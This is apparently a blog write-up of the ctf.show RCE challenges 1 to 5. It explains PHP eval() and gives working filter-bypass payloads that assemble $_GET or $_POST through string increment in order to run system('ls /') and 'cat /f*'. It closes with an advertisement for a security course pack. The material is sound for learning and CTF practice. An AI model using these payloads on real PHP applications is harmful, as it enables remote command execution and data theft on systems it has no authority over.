ctfshow每周大挑战之RCE极限挑战

1、ctf.show每周大挑战之RCE极限挑战

php的eval()解释：

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码，且必须以分号结尾。

return 语句会立即终止对字符串的计算。

返回值：除非在代码字符串中调用 return 语句，则返回传给 return 语句的值，否则返回 NULL。如果代码字符串中存在解析错误，则 eval()
函数返回 FALSE。

2、RCE挑战1

如下图所示，POST传参时，参数名为code，后台对 “(”、“.” 做了替换。

如何才能查找到想要的flag呢？执行远程命令使用 system(‘ls /’); 或使用反引号 ls /;

如上图所示，使用post的code参数传参时，echo ls /，显示出系统命令执行的结果，看到有个f1agaaa文件，看似是flag文件，再查看该文件内容 echo cat /f1agaaa，这里也可以使用通配符进行内容查看 echo cat /f* ，获取到flag，如下图所示：

3、RCE挑战2

如下图所示，POST传参时，参数名为ctf_show，后台对参数值做了正则匹配。

先确认哪些字符可传入。

<?php
for ($i=32;$i<127;$i++){
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
            echo chr($i)." ";
        }
}


//post可传入的字符如下：
// ! $ ' ( ) + , . / ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害，想办法再同时进行get传参。使用数组绕过，获取数组名的第一个字符A，通过变量自增，组装$GET[]，以便达到get传参，执行远程命令。

$_=[]._;           //$_变量，[]默认表示数组名Array，._ 表示数组名Array拼接上字符'_'
var_dump($_);      //输出变量内容为："Array_"
$__=$_['!'==','];  //里面判断结果为false，即$_[0]，即取字符串"Array_"[0] 下标为0的字母，即"A"，赋值给变量$__
$__++;$__++;$__++; //$__变量自增，值为B、C、D
$___=++$__;        //$___变量赋值为E，$__变量当前值为E
++$__;             //$__变量值自增，当前值为F
$___=++$__.$___;   //$__变量值自增，当前值为"G",拼接变量$___的值"E"后，再赋值给变量$___,其值为  "GE"
++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__; //$__变量自增，值为H、I、J、K、L、M、N、O、P、Q、R、S
$___=$___.++$__;   //$__变量值自增，当前值为T，$___变量的值"GE"拼接"T"，再赋值给$___变量，其值为"GET"
$_='_'.$___;       //'_'拼接$___变量的值"GET"，后再赋值给$_变量，其值为"_GET"
$$_[_]($$_[__]);   //即组装出$_GET[_]($_GET[__])，以便get传参，参数名为_和__，如_参数传参为system，__参数传参为ls /，即get传参后拼接出system('ls /')命令，以便eval去执行


//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);

//get传参
?_=system&__=ls /

如下图所示，拼装了一个${}_{G}ET{[}_{]}($_GET[__]);组合，传递2个参数来达到执行 system(‘ls
/’);的目的（尝试只传递一个参数$GET[]接收 system(“ls /”)参数，访问时没什么反应，没想明白为何不行…）。

如上图所示，get参数_传system值，参数__传ls
/值，可以查看到根目录有个f1agaaa文件，貌似是flag文件，如下图所示，参数_传system，参数__传cat /f1agaaa，打开得到falg。

//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);

//get传参
?_=system&__=cat /f1agaaa

//或get传参
?_=system&__=cat /f*

4、RCE挑战3

如下图所示，POST传参时，参数名为ctf_show，后台对参数值做了正则匹配。

先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
            echo chr($i)." ";
        }
}

//post可传入的字符如下
//  0 $ 1 ( ) + , . / ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害，想着同时进行get传参，但是限制了post参数长度(<=105)。使非数字绕过，_/_非法运算时返回NAN，通过变量自增，组装$POST[]，以便达到post传参，执行远程命令。

注意：之前好奇为啥 $d1 =
‘ab’.‘cd’[0]，输出值为"abc"，这里涉及到运算优先级问题，‘cd’[0]的值为"c"，再和前面的’ab’拼接后，即"abc"。

$_=(_/_._)[0];  //$_变量的值为"NAN_"[0]的值，即值为"N"
$_0=++$_;       //$_变量自增后，值为"O",且再赋值给变量$_0，且其值为"O"
$_0=++$_.$_0;   //$_变量增增后，值为"P",再拼接变量$_0的值"O",再赋值给变量$_0,即值为"PO"
++$_;++$_;      //$_变量增增后，值为"Q"、"R"
$_0.=++$_;      //变量$_0变量的值为"PO",再拼接$_变量增增后的值"S"，再赋值给变量$_0,即值为"POS"
$_0.=++$_;      //变量$_0变量的值为"POS",再拼接$_变量增增后的值"T"，再赋值给变量$_0,即值为"POST"
$_=_.$_0;       //变量$_重新赋值为"_"拼接变量$_0的值"POST",即值为"_POST"
$$_[0]($$_[1]); //替换$_0变量的值"_POST"后，即组装出 $_POST[0]($_POST[1])，以便post传参，参数名为0和1，如0参数传参为system，1参数传参为ls /，即post传参后拼接出system('ls /')命令，以便eval去执行。


//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=ls /

如下图所示，拼装了一个${}_{P}OST[0]($_POST[1]);组合，传递2个参数来达到执行 system(‘ls
/’);的目的（尝试只传递一个参数$_POST[0]接收 system(“ls /”)参数，访问时没什么反应，没想明白为何不行…）。

如上图所示，post参数0传system值，参数1传ls
/值，可以查看到根目录有个f1agaaa文件，貌似是flag文件，如下图所示，参数0传system，参数1传cat /f*，打开得到falg。

//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=cat /f*

疑问：post的参数再进行post传参不被正则过滤掉！?

同理，也可以尝试使用该方法查找RCE挑战2的flag。

//post传参
ctf_show=$_=(_/_._)['!'==','];$__=++$_;$__=++$_.$__;++$_;++$_;$__.=++$_;$__.=++$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=cat /f*

5、RCE挑战4

如下图所示，POST传参时，参数名为ctf_show，后台对参数值做了正则匹配。

先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
        echo chr($i)." ";
    }
}

//post可传入的字符如下
//  $ ( ) + , . / 0 ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害，想着同时进行get传参，但是限制了post参数长度(<=85)。使非数字绕过，_/_非法运算时返回NAN，通过变量自增，组装$POST[]，以便达到post传参，执行远程命令。

注意：KaTeX parse error: Expected group after '_' at position 1: _̲_=.${}_{+}+（这里涉及3个运算符，=、.、++，其中++运算符优先级最高，$++运算后，${}_{变}量的值为"P"，其中.$_++，表示拼接变量$_自增前的值"O"）

$_=(_/_._)[0];    //变量$_的值为"NAN_"[0],即值为"N"
++$_;             //变量$_的值自增后，值为"O"
$__=$_.$_++;      //变量$_的值自增后，值为"P"，再拼接变量$_自增前的值"O"，再赋值给变量$__,其值为"PO"
++$_;++$_;++$_;   //变量$_的值自增后，值为"Q"、"R"、"S"
$__.=$_++.$_;     //变量$_的值为"S"，再拼接自增后的值"T"，再拼接到变量$__(值为"PO")的后面，最后再赋值给变量$__，即值为"POST"
$_=_.$__;         //"_"拼接值为"POST"的变量$__,再赋值给变量$_，即值为"_POST"
$$_[_]($$_[0]);   替换$_变量的值"_POST"后，即组装出 $_POST[_]($_POST[0])，以便post传参，参数名为_和0，如_参数传参为system，0参数传参为ls /，即post传参后拼接出system('ls /')命令，以便eval去执行


//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=ls /

如下图所示，拼装了一个${}_{P}OST{[}_{]}($_POST[0]);组合，传递2个参数来达到执行 system(‘ls
/’);的目的（尝试只传递一个参数$POST[]接收 system(“ls /”)参数，访问时没什么反应，没想明白为何不行…）。

如上图所示，post参数_传system值，参数0传ls
/值，可以查看到根目录有个f1agaaa文件，貌似是flag文件，如下图所示，参数_传system，参数0传cat /f*，打开得到falg。

//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=cat /f*

6、RCE挑战5

如下图所示，POST传参时，参数名为ctf_show，后台对参数值做了正则匹配。

先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
        echo chr($i)." ";
    }
}

//post可传入的字符如下
// $ ( ) + , . / ; = [ ] _ 

字符长度如何再减少呢？直接将_POST当做post参数的参数名。

$_=(_/_._)[_];                     //变量$_的值为"NAN_"[0],即值为"N"
++$_;                              //变量$_的值自增后，值为"O"
$__=$_.$_++;                       //变量$_的值自增后，值为"P"，再拼接变量$_自增前的值"O"，再赋值给变量$__,其值为"PO"
++$_;++$_;                         //变量$_的值自增后，值为"Q"、"R"
$$_[$_=_.$__.++$_.++$_]($$_[_]);   //变量$_的值自增后，值为"S"、"T",并将其拼接到一起"ST",再拼接到$__变量(值为"PO")之后，即值为"POST",
                                   //在再前面拼接"_"，即值为"_POST",并赋值给$_变量，再组装成$_POST[]($_POST[_])


//post传参
ctf_show=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;$$_[$_=_.$__.++$_.++$_]($$_[_]);

学习计划安排

我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦，无偿分享！！！

如果你对网络安全入门感兴趣，那么你需要的话可以

点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

## 网络安全工程师(白帽子)企业级学习路线

第一阶段：安全基础（入门）

第二阶段：Web渗透（初级网安工程师）

第三阶段：进阶部分（中级网络安全工程师）

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

学习资源分享